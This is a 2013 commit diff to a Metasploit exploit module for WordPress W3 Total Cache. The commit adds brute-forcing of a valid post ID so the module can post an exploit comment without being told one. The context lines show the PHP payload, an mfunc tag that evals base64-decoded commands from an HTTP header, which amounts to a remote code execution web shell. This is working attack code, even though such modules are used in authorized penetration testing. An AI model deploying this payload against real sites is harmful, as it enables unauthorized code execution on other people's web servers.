Add POST ID bruteforcing capabality

jvazquez-r7 · jvazquez-r7 · commit ded0269ba0a7 · 2013-04-24T17:21:36.000-05:00
diff --git a/modules/exploits/unix/webapp/php_wordpress_total_cache.rb b/modules/exploits/unix/webapp/php_wordpress_total_cache.rb
@@ -51,7 +51,7 @@ def initialize(info = {})
 			register_options(
 				[
 					OptString.new('TARGETURI', [ true, "The base path to the wordpress application", "/wordpress/" ]),
-					OptInt.new('POSTID', [ true, "The post ID where publish the comment" ]),
+					OptInt.new('POSTID', [ false, "The post ID where publish the comment" ]),
 					OptString.new('USERNAME', [ false,  "The user to authenticate as (anonymous if username not provided)"]),
 					OptString.new('PASSWORD', [ false,  "The password to authenticate with (anonymous if password not provided)" ])
 				], self.class)
@@ -102,6 +102,33 @@ def login
 
 	end
 
+	def check_post_id(uri)
+		options = {
+			'method' => 'GET',
+			'uri'    => uri
+		}
+		options.merge!({'cookie' => "#{@cookie_name}=#{@cookie_value}"}) if @auth
+		res = send_request_cgi(options)
+		if res and res.code == 200 and res.body =~ /form.*action.*wp-comments-post.php/
+			return true
+		elsif res and (res.code == 301 or res.code == 302) and res.headers['Location']
+			location = URI(res.headers["Location"])
+			uri = location.path
+			uri << "?#{location.query}" unless location.query.nil? or location.query.empty?
+			return check_post_id(uri)
+		end
+		return false
+	end
+
+	def find_post_id
+		(1..1000).each{|id|
+			vprint_status("#{peer} - Checking POST ID #{id}...")
+			res = check_post_id(normalize_uri(target_uri) + "/?p=#{id}")
+			return id if res
+		}
+		return nil
+	end
+
 	def post_comment
 		php_payload = "<!--mfunc if (sha1($_SERVER[HTTP_SUM]) == '#{@sum}' ) { eval(base64_decode($_SERVER[HTTP_CMD])); } --><!--/mfunc-->"
 
@@ -149,6 +176,19 @@ def exploit
 			print_status("#{peer} - Trying unauthenticated exploitation...")
 		end
 
+		if datastore['POSTID'] and datastore['POSTID'] != 0
+			@post_id = datastore['POSTID']
+			print_status("#{peer} - Using the user supplied POST ID #{@post_id}...")
+		else
+			print_status("#{peer} - Trying to brute force a valid POST ID...")
+			@post_id = find_post_id
+			if @post_id.nil?
+				fail_with(Exploit::Failure::BadConfig, "#{peer} - Unable to post without a valid POST ID where comment")
+			else
+				print_status("#{peer} - Using the brute forced POST ID #{@post_id}...")
+			end
+		end
+
 		random_test = rand_text_alpha(4096)
 		@sum = Rex::Text.sha1(random_test)
 
